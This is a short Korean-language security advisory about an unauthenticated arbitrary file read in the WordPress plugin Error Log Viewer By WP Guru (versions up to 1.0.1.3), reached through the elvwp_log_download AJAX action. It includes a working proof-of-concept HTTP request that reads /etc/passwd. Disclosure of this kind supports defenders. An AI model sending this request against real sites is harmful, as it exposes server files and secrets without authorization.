
Error Log Viewer By WP Guru <= 1.0.1.3 - 인가 누락으로 인한 비인증 임의 파일 읽기
Error Log Viewer By WP Guru <= 1.0.1.3 - 인증 누락으로 인한 비인증 사용자의 임의 파일 읽기
WordPress용 Error Log Viewer By WP Guru 플러그인은 wp_ajax_nopriv_elvwp_log_download AJAX 액션을 통해 1.0.1.3을 포함한 모든 버전에서 임의 파일 읽기(Arbitrary File Read) 취약점에 영향을 받습니다. 이를 통해 인증되지 않은 공격자는 서버에 있는 임의 파일의 내용을 읽을 수 있으며, 해당 파일에는 민감한 정보가 포함될 수 있습니다.
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
Content-Type: application/x-www-form-urlencoded
Content-Length: 80
action=elvwp_log_download&elvwp_error_log_download=1&elvwp_error_log=/etc/passwd